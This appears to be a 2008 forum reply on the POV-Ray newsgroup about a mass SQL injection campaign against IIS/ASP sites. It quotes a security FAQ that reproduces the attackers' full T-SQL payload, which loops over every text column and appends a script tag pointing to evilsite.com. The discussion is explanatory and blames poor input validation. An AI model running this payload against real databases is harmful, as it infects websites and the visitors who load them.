Home   Groups   Digests   Personalise   Search   Login
  POV-Ray : Newsgroups : povray.off-topic : I promised not to mock ... : Re: I promised not to mock ... Server Time
7 Sep 2024 13:25:40 EDT (-0400)
  Re: I promised not to mock ...  
From: Gail Shaw
Date: 28 Apr 2008 16:10:08
Message: <48162f20@news.povray.org>
 
"Doctor John" <doc### [at] gmailcom> wrote in message
news:481623fb@news.povray.org...
> http://blog.wired.com/monkeybites/2008/04/microsoft-datab.html
>

From what I read, that's not the fault of any MS product, but of bad
developers not checking their DB input. SQL injection is just as possible on
a unix powered site with apache and oracle as iot is with IIS and SQL server
(or IIS with MySQL, or IIS with Oracle, or apache windows woth SQL server
...)

http://hackademix.net/2008/04/26/mass-attack-faq/

The attack is targeting Microsoft IIS web servers. Is it exploiting a
Microsoft vulnerability?
Yes and no. Web developers (or their employers who did not mandate proper
security education) are to blame for each single infection, because the SQL
injection exploited to infect the web sites is possible thanks to trivial
coding errors.
That said, the attackers are targeting IIS web servers which run ASP for a
reason.
Crackers put together a clever SQL procedure capable of polluting any
Microsoft SQL Server database in a generic way, with no need of knowing the
specific table and fields layouts:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
''<script src=http://evilsite.com/1.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;

This is the "secret sauce" which is allowing the attack to reach its
impressive numbers, and it works exclusively against Microsoft database
technology - but it's a feature, not a bug (no irony intended this time).
Anyway, the chances for such "powerful" DB technology of being used in
conjunction with web servers different than IIS are very low.
So, to recap:

  1.. There's no Microsoft-specific vulnerability involved: SQL injections
can happpen (and do happen) on LAMP and other web application stacks as
well.
  2.. SQL injections, and therefore these infections, are caused by poor
coding practices during web site development.
  3.. Nonetheless, this mass automated epidemic is due to specific features
of Microsoft databases, allowing the exploit code to be generic, rather than
tailored for each single web site. Update: more details in this comment.


Post a reply to this message

Copyright 2003-2023 Persistence of Vision Raytracer Pty. Ltd.